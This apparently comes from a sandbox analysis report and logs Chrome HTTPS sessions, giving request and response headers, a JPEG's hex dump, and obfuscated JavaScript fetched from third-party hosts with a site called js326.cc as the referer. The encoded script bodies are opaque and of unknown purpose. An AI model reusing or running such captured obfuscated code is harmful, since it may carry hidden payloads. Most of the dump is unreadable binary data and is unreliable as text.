                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 2a 85 52 0a 29 a5 be 6e cb 35 db 8f bb 3b 5b 6d 44 fb a2 a5 0b 27 dd 64 22 42 0a 34 1a a3 0c 5e d0 b0 4f 9c 39 7d 61 61 7c 6c 41 de e8 dc f1 bd cf a8 b0 ee d5 5a ba 7b 2a 57 bf e4 e5 8f 2d 5c 38 7f e8 f8 c4 c9 79 1b 97 2e 94 53 63 13 78 5e 40 2e df 49 7b 6b 3b 9e 5f 63 7c b6 84 ad 20 6b 49 b1 62 de 52 fa 5b 7b 99 b0 87 28 9a 3a a7 ca b3 9c 39 56 61 f8 d1 31 dc 4c 9a 52 a5 4e 64 c0 11 06 6c 8b aa 0a d0 96 c0 72 12 1c 3a 74 18 91 74 59 b1 6e 0d a9 4c 8e b1 c1 41 1a c5 22 7d 2d ed cc 4b 5b 24 c7 06 d1 47 5c 91 ec e9 83 54 7e d4 d2 b6 ae d6 eb 28 34 8e 9d f8 8d 13 89 bf 5a 62 f4 2a 08 1f 8d 8b 11 7d 74 e4 6b df 09 4f 95 a7 8f 4f ee ff ce d7 1b 78 b3 20 1a 71 57 36 69 ce eb 48 33 67 97 02 66 86 76 97 16 ae ba 38 41 94 12 36 0d 1b 84 d3 ee d5 a7 4b b8 0a ea 26
                                                                                                                                                          Data Ascii: *R)n5;[mD'd"B4^O9}aa|lAZ{*W-\8y.Scx^@.I{k;_c| kIbR[{(:9Va1LRNdlr:ttYnLA"}-K[$G\T~(4Zb*}tkOOx qW6iH3gfv8A6K&
                                                                                                                                                          2024-06-09 22:41:20 UTC8687INData Raw: a1 91 71 ea 72 79 0a b9 22 ae eb cd 06 d9 4e 8d 04 c0 95 12 ad 14 b9 4c 86 86 c6 46 3a e6 75 20 f1 28 57 2a 5f fd ab bf fd cb 8f fc c5 17 fe 57 ea 01 9c 66 d6 bd fb a6 8e 23 cf f5 95 07 9f 7c 78 62 de 8a 93 8e 8c 8b c6 57 2c 3c ff 62 3d f8 cc 2f c7 46 76 3c 60 30 93 08 5c ac ab d3 93 41 68 c8 64 98 bb 66 43 30 91 6d fb ca 80 d7 f8 c7 61 dd 82 6b bc fa 13 df 75 f2 19 eb 8b bd db 1f 7c 0c 35 91 02 d2 70 b1 56 ce ee bd 78 21 3c ea 05 ae a2 46 6f e1 22 e5 ff 19 ee 22 53 d7 84 87 4c 9b 08 5a 41 30 9e 72 ce 45 43 72 6c f8 e0 2f 1f ff da 97 46 29 e4 e4 86 0f be ff f2 b2 36 73 91 8d 20 eb d0 64 81 34 80 cd e7 ea ed 39 e7 6c f8 49 35 a8 de 35 fb e2 b6 16 43 a5 83 d9 38 35 b1 87 f6 a6 e6 d1 d5 a7 ac 0c 93 44 31 36 3e c6 74 b9 4c 35 0a 49 b4 22 d1 0a 2f e3 11 25 31
                                                                                                                                                          Data Ascii: qry"NLF:u (W*_Wf#|xbW,<b=/Fv<`0\AhdfC0maku|5pVx!<Fo""SLZA0rECrl/F)6s d49lI55C85D16>tL5I"/%1


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          579192.168.2.55035443.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC368OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 14088167043855553218
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1119INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:20 UTC4096INData Raw: 11 00 02 11 01 03 11 01 ff c4 00 bf 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 06 02 03 04 05 07 01 08 00 09 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 00 05 06 07 08 10 00 02 01 03 03 02 05 02 03 06 05 02 03 09 00 00 01 02 03 11 04 05 00 12 06 21 31 41 51 22 13 07 61 14 71 81 32 91 a1 42 23 15 08 b1 c1 52 62 16 b2 33 d1 82 24 72 92 a2 43 53 73 93 54 84 11 00 02 00 04 04 02 07 04 05 08 07 06 07 00 00 00 01 02 00 11 03 04 21 31 12 05 41 51 61 71 91 22 13 06 07 81 a1 32 42 b1 52 62 72 14 d1 e1 82 a2 e2 23 93 54 c1 92 b2 33 15 16 17 f0 d2 73 b3 34 44 c2 43 53 63 25 45 26 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 c2 3d c2 a4 15 34 23 b1 1a fa 32 51 e0 11 1a 79 19 ea cc c5 8f d7 4b 22 24 45 15 e9 28 ac 0f 76 ed a0 23 18 21 02 77 4f
                                                                                                                                                          Data Ascii: !1AQ"aq2B#Rb3$rCSsT!1AQaq"2BRbr#T3s4DCSc%E&?=4#2QyK"$E(v#!wO
                                                                                                                                                          2024-06-09 22:41:20 UTC2800INData Raw: 10 7f 3d 41 58 c9 c1 87 04 e7 1c 9b e3 bc ec 7c 87 8b 5f fd 9d df b4 d6 d7 b6 f2 28 96 da f2 d6 42 0c 96 d7 50 b7 a6 58 9c a8 25 4f 62 03 2d 19 55 86 9f 7a d8 6d 37 9b 63 6d 74 9a 90 e2 38 15 6e 0c a7 83 0f a3 03 30 48 8b fb 76 eb 71 b7 56 15 a8 34 98 76 11 c8 8e 22 3d eb 69 f2 9f 30 b7 c6 e3 6f f2 3c 23 95 63 ed 33 58 f8 32 56 17 fc 52 ea 4c de 2e 78 ae 57 72 ec 43 20 96 00 a4 94 2b 24 d2 32 ba b2 37 a8 1a 7c d1 7d e4 4b 36 ae f4 ad 6f e8 86 46 2a 52 e3 f7 35 14 83 2e 44 3f 39 a8 00 8c 44 7b 75 9f 9b ee 05 15 7b 8b 4a 84 30 04 3d 21 e2 23 4f b3 4f 51 38 18 ab b9 f9 bb 25 1d 7d de 3d ce cf 9f bd 61 22 ff 00 8c c7 55 c7 a7 75 bf 9d b2 fe 37 ec c5 9f f3 9d 2f e5 6e bf 85 fb 51 4f 27 cf 6a 3d 17 1c 77 94 95 ff 00 e9 cd 68 19 49 1f ed 79 29 a2 1e 9e 57 19 5f
                                                                                                                                                          Data Ascii: =AX|_(BPX%Ob-Uzm7cmt8n0HvqV4v"=i0o<#c3X2VRL.xWrC +$27|}K6oF*R5.D?9D{u{J0=!#OOQ8%}=a"Uu7/nQO'j=whIy)W_
                                                                                                                                                          2024-06-09 22:41:20 UTC1296INData Raw: 41 56 40 ba 7a 9d 38 8c 63 5f 51 cd 41 23 87 54 72 1b 1b f9 a3 39 39 ad 8f db 9d 83 7a b2 d3 af 45 a0 26 bd 75 6d 41 38 98 a9 35 1d d9 c1 3e 66 3b 5b 4b 24 82 c1 dd e1 b8 8e 27 bb 32 a8 04 3f 52 02 d0 0e 9a 22 0f 18 15 99 c4 c0 8a 8e ba 18 61 85 d3 53 28 18 48 3a 38 ad 28 55 75 31 90 b5 f0 d4 88 13 04 9c 6e 3b 29 b2 71 47 91 bf fe 9b 66 c0 fb d7 85 43 85 a7 55 05 48 35 04 8a 6a bd d9 92 7b 63 65 b5 16 15 18 a8 99 97 f4 c5 f7 28 bb cc e5 e1 9b 25 8a c5 8c 66 12 28 fd a9 56 de 48 4c 4e 50 90 ce dd 41 a9 04 0a 53 54 41 94 6d 19 42 f7 58 cc f4 c6 79 61 6f 64 29 77 75 71 10 78 59 9b ec 64 15 12 6d 15 00 91 e7 a9 49 67 38 ab 57 54 e4 07 b6 27 19 f2 12 23 65 2c 2d 5f 19 69 10 1b 9a d4 b2 20 64 3f ab d2 57 ad 4f 7a 68 d8 07 52 08 12 23 11 ce 05 40 46 02 7d e1 db
                                                                                                                                                          Data Ascii: AV@z8c_QA#Tr99zE&umA85>f;[K$'2?R"aS(H:8(Uu1n;)qGfCUH5j{ce(%f(VHLNPASTAmBXyaod)wuqxYdmIg8WT'#e,-_i d?WOzhR#@F}
                                                                                                                                                          2024-06-09 22:41:20 UTC1400INData Raw: 06 c5 8a 19 bd d7 27 c9 75 ce 1d 9f cb 14 bb cf b8 d5 70 33 54 a2 55 8f 53 3f 74 7b 63 74 77 1d f9 fb ab 64 88 79 b5 50 54 75 85 c4 fb 23 27 f9 3b 92 65 33 79 4b 8c 2c 79 98 2f f8 c7 19 b9 64 b3 b4 c6 81 0e 30 cc 4f b7 2d c5 b4 4a 17 79 93 6f fd d7 ab b0 02 a6 94 03 e8 7f 28 79 6e c7 6c b3 5a b6 f6 e6 93 d4 50 5b 59 d5 5a 59 80 e7 81 94 89 41 25 53 84 a7 1e 2b e6 3d ea ea fa e5 92 bd 61 50 29 20 69 12 a7 3e 25 47 11 39 c9 8e 24 46 71 96 2e 72 32 ed 63 ee 26 df 64 83 d8 0e a3 b6 bb 0b 81 36 94 73 b4 4e 91 38 5f f5 46 10 bc 17 30 ad c3 b3 06 66 98 96 61 41 d9 4f 80 3a 42 77 30 22 2d 3b 0a 82 73 91 8a e5 82 27 42 e2 61 ee 10 48 80 0a 92 7c 00 d1 84 04 67 15 8b 90 72 c3 9c 14 60 2f 25 b1 b8 8f ef 2d 3e fe 07 4d b1 d9 5d 7b 86 3a 82 08 60 a2 a3 a7 e1 ab 28 0f
                                                                                                                                                          Data Ascii: 'up3TUS?t{ctwdyPTu#';e3yK,y/d0O-Jyo(ynlZP[YZYA%S+=aP) i>%G9$Fq.r2c&d6sN8_F0faAO:Bw0"-;s'BaH|gr`/%->M]{:`(
                                                                                                                                                          2024-06-09 22:41:20 UTC2800INData Raw: 1c 89 24 9e b1 39 1e 30 0b 7d ef 5f 0b 8b c4 b5 58 a1 0c a6 61 12 80 a8 29 4f a6 bd 02 a0 24 47 1b 4c 85 39 c5 64 ee 64 b8 2d 23 ec 3b 54 2b 53 c0 01 4e df 4d 25 cc db 18 62 e0 b8 47 0c 8b 22 6d 48 6b 28 a6 e9 07 5a d3 cc 6b 09 0c 32 c6 25 41 53 39 e1 09 81 5f dd a8 71 03 a7 a8 13 d2 87 58 a3 1e 51 8e 44 b9 c1 35 9e 54 4b 0b e3 e4 b0 fe a9 91 60 c9 67 79 51 58 eb 42 36 80 2b d3 4f 5a 84 99 66 79 c2 4a 4b bd 90 e5 12 26 59 12 38 d2 59 0b 4b 42 d3 47 42 36 49 52 a5 68 7c 40 03 ae 9f c2 27 54 e2 cf 8e 5a c7 77 2e 42 d4 23 0b bd b1 cd 04 db f6 aa a2 f4 65 a1 e8 49 24 78 6a b5 5c 0c 43 ae ae b8 66 60 f1 de 47 1a b5 56 59 91 58 9d 85 bf 55 3a 11 d0 6b 38 42 81 94 0e 80 7c 8e 9f 38 18 56 d3 e5 a9 06 22 70 b0 0f 96 a6 62 20 98 97 17 b8 62 9d 15 88 47 51 ee 47 bc
                                                                                                                                                          Data Ascii: $90}_Xa)O$GL9dd-#;T+SNM%bG"mHk(Zk2%AS9_qXQD5TK`gyQXB6+OZfyJK&Y8YKBGB6IRh|@'TZw.B#eI$xj\Cf`GVYXU:k8B|8V"pb bGQG
                                                                                                                                                          2024-06-09 22:41:20 UTC100INData Raw: 91 1d a4 22 ef 19 97 8f 21 65 69 24 b2 3a 47 0c 57 bf 68 b1 87 2d b4 31 43 db ae 86 ad 7a b5 76 cd b7 71 50 5c 51 d0 f5 14 77 8e 96 a6 69 bb 00 26 59 a9 96 9c b3 ce 31 69 53 4b eb db 36 3a 4d 4d 4a 84 e0 26 1c 32 89 9c 83 01 29 f5 46 53 84 f8 f3 93 45 cf f8 df 07 e4 7c 62 f2 29 ce 66 ca d3 21 84 bb
                                                                                                                                                          Data Ascii: "!ei$:GWh-1CzvqP\Qwi&Y1iSK6:MMJ&2)FSE|b)f!
                                                                                                                                                          2024-06-09 22:41:20 UTC1400INData Raw: 8d e0 98 db 4b 2a c7 33 0d bb 58 fa 5a a8 ca 4d 7a 11 51 ae b2 f7 78 a1 57 6e a9 73 6b 59 4c 91 99 58 10 44 c0 9e 33 c3 ac 1e ac 23 41 6d b7 55 a7 78 94 6b d2 6c 58 02 a4 10 71 32 e1 ee 22 35 6c be 27 11 6d f2 37 2c 63 14 90 7c 7f f0 b9 bb 93 23 8b 71 f7 60 c5 63 77 f6 76 56 ec 64 56 dd f7 97 4f 04 2d 52 3d 2c cf d0 29 a6 98 ee 57 15 b6 7b 70 18 1b 9b c5 50 0f c3 22 eb ae a3 48 64 29 a6 a3 30 0e 20 71 31 b2 16 54 69 6e 55 49 12 a1 6e cc 4f 19 e9 3a 50 63 99 76 d2 25 d7 02 5c de d8 7c 87 f1 6e 0f e4 68 26 bf c9 e7 fe 36 98 71 fe 7f 91 bb 8c b5 cc f6 39 09 a5 ba c2 df ce 54 ca 08 56 33 da 33 b4 95 01 2d d3 b1 1a 1d a4 b6 d3 b9 bd 9d 45 54 a7 70 3c 4a 41 4f 74 3a 00 b5 50 4c 29 99 1a 6a 48 09 62 e6 0a fc 0d c2 c9 6e 10 b3 bd 23 a2 a1 23 12 ac 49 46 32 98 90
                                                                                                                                                          Data Ascii: K*3XZMzQxWnskYLXD3#AmUxklXq2"5l'm7,c|#q`cwvVdVO-R=,)W{pP"Hd)0 q1TinUInO:Pcv%\|nh&6q9TV33-ETp<JAOt:PL)jHbn##IF2
                                                                                                                                                          2024-06-09 22:41:20 UTC2800INData Raw: e1 88 9c 2c df dd 39 05 aa b9 23 11 36 38 1e 8c 70 88 bc fb 37 94 c7 0b 37 b1 cb cd 04 f7 12 bc f2 de a1 68 e7 91 e3 a1 af b9 bb 7d 77 35 4e 9a d4 d3 c3 d1 a4 05 94 a5 2c 25 ca 59 4b a2 01 2a b9 6d 64 9d 59 cf 8c f9 cf 9c 67 97 3c d3 93 df 25 f7 f5 6c d5 f6 61 33 00 2e 41 b2 17 13 5c 0b 92 8c ac a6 5f 72 43 bc a6 d1 42 7b 6a a0 b1 b6 4d 3a 69 a8 d1 f0 c9 40 d3 3c f4 e1 87 b2 2c 9b aa cd ab 53 b1 d5 9c c9 33 eb e7 ed 81 d8 6e 4c a4 2f 55 08 a4 27 a8 ed 51 52 68 3c ba 9a ea c2 81 8e 19 c2 4c c7 18 be ba c9 64 b2 f3 1b ac f6 5e 7c d5 c0 44 8d 27 bc 9a 4b 87 54 41 45 5d d2 16 34 03 b0 d0 d0 b7 a5 41 74 d2 50 ab c9 40 03 b0 41 55 ad 52 ab 6a 76 2c 79 93 33 ef 83 1c 2f c9 3c f7 1d 89 fe 9d 8a e6 99 bc 6e 2d 04 96 a7 19 6f 7d 38 b5 f6 a7 51 19 fe 49 90 20 35 a7
                                                                                                                                                          Data Ascii: ,9#68p77h}w5N,%YK*mdYg<%la3.A\_rCB{jM:i@<,S3nL/U'QRh<Ld^|D'KTAE]4AtP@AURjv,y3/<n-o}8QI 5
                                                                                                                                                          2024-06-09 22:41:20 UTC1400INData Raw: fc 46 c3 82 da 70 7e 33 c3 e6 8a c6 7c 9c 79 3c bb e4 72 71 e4 65 98 44 92 45 b7 dc 8e ce d4 44 fb 65 6a 36 c6 3d 47 95 0e 51 b7 aa 2b 1a ac c0 99 48 00 08 18 99 f3 33 c8 71 8a 77 b7 14 84 91 09 cc 12 75 02 70 12 03 01 d2 73 06 3e c1 7c b7 61 2f 34 cc 73 ab 8c 25 cd ed ec f7 26 ef 19 c7 a2 bf 48 2d 2d 16 15 2b 0a 4e 8f 69 29 9e 28 53 62 a6 d6 8d 80 5e fd 7a 5a 36 7a ed c5 05 60 04 a4 49 13 27 99 18 89 13 8f 3c e1 2b 7a 8d 58 d5 75 99 9c c6 32 97 2e 06 63 2e 51 8f db 89 b1 ce e6 cd e2 84 dc 2e d2 24 40 e0 2f 81 56 35 a7 7d 6d 46 11 a9 ad 67 ab 15 c7 a2 05 72 a2 93 c4 a4 7a a3 4d 92 1f 32 09 eb e1 a4 5d 7c 40 f4 42 28 09 02 3a 62 21 60 63 1e e7 a8 8e d4 fd da 51 cb 18 60 12 38 44 6d 2a 19 1d 24 7e 3f 5d 4c 44 74 ad 05 6a 0f d3 52 56 42 71 93 87 5a 5d d1 ed
                                                                                                                                                          Data Ascii: Fp~3|y<rqeDEDej6=GQ+H3qwups>|a/4s%&H--+Ni)(Sb^zZ6z`I'<+zXu2.c.Q.$@/V5}mFgrzM2]|@B(:b!`cQ`8Dm*$~?]LDtjRVBqZ]


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          580192.168.2.55036090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC558OUTGET /pc/240516-03/static/js/components/125/footerNav.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC629INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 4220
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:01 GMT
                                                                                                                                                          ETag: "6645ca5d-107c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE14[3],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063156
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 21d4c0c32520cab63c5328f03b1eff0d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528844
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC4220INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 56 6c 77 46 30 41 61 41 62 77 43 4a 38 45 41 4e 59 43 67 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 6b 53 4f 41 53 6a 49 42 66 45 67 48 45 41 6d 67 41 55 41 37 4d 7a 61 63 65 61 50 67 4a 4a 52 68 46 46 6b 68 41 41 43 4a 42 77 42 4f 58 54 68 51 44 63 41 65 54 41 41 72 45 4a 77 42 30 41 45 78 42 4d 75 61 45 4e 4d 4d 6f 49 49 51 78 77 43 65 6d 42 77 6b 46 41 44 36 6f 53 42 49 41 4c 49 6f 6a 69 77 41 4e 69 41 55 35 41 42 75 55 50 45 73 49 41 77 41 68 41 41 4d 49 6f 4a 6d 61 59 61 36 4c 41 43 38 55 4a 67 55 75 54 41 51 54 42 53 43 4a 43 6c 6c 5a 49 35 51 48 46 41 4b 37 4e 79 38 77 6f 59 67 48 43 79 47 61 47 52 6f 55 43 6b 4d 32 4b 51 77 6a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAVlwF0AaAbwCJ8EANYCgLgDMBXNGAFwEt1MkSOASjIBfEgHEAmgAUA7MzaceaPgJJRhFFkhAACJBwBOXThQDcAeTAArEJwB0AExBMuaENMMoIIQxwCemBwkFAD6oSBIALIojiwANiAU5ABuUPEsIAwAhAAMIoJmaYa6LAC8UJgUuTAQTBSCJCllZI5QHFAK7Ny8woYgHCyGaGRoUCkM2KQwj


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          581192.168.2.55035890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC564OUTGET /pc/240516-03/static/js/components/125/footerCopyRight.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 816
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:01 GMT
                                                                                                                                                          ETag: "6645ca5d-330"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE25[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063156
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6da855ca33f1ff89ded3ce1299dadb14
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528844
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC816INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 4c 67 44 67 46 30 41 61 41 62 77 42 4d 6f 41 58 58 41 4c 67 44 4d 42 58 4e 47 61 67 53 33 55 32 70 4c 52 4a 41 43 55 5a 41 45 52 4d 6b 49 41 41 52 4a 71 41 4a 33 5a 74 68 41 62 67 44 79 59 41 46 59 67 32 41 4f 67 6f 67 47 37 4e 43 41 41 4b 4d 6c 42 42 41 7a 71 41 54 30 78 39 68 41 66 58 73 67 6b 41 57 52 51 55 6d 41 47 78 44 44 79 41 4e 79 68 50 4a 68 41 36 41 45 49 41 42 67 42 66 41 55 55 41 6d 51 6b 55 41 46 34 51 54 47 46 77 6d 41 67 47 59 51 45 53 47 45 54 4b 47 69 68 47 46 6a 5a 4f 4e 45 77 68 47 52 42 71 4a 68 6b 30 4d 68 67 7a 4b 77 41 6c 64 67 42 7a 41 41 74 71 4f 6d 46 66 47 41 6f 30 49 78 6f 4f 75 68 51 64 50 53 67 76 61 69 30 41
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnLgDgF0AaAbwBMoAXXALgDMBXNGagS3U2pLRJACUZAERMkIAARJqAJ3ZthAbgDyYAFYg2AOgogG7NCAAKMlBBAzqAT0x9hAfXsgkAWRQUmAGxDDyANyhPJhA6AEIABgBfAUUAmQkUAF4QTGFwmAgGYQESGETKGihGFjZONEwhGRBqJhk0MhgzKwAldgBzAAtqOmFfGAo0IxoOuhQdPSgvai0A


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          582192.168.2.55035790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC558OUTGET /pc/240516-03/static/js/components/125/footerImg.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1108
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:57:01 GMT
                                                                                                                                                          ETag: "6645ca5d-454"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE30[3],EU-FRA-paris-GLOBAL1-CACHE17[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063156
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2ae308fa629c808023582c253c587216
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528844
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
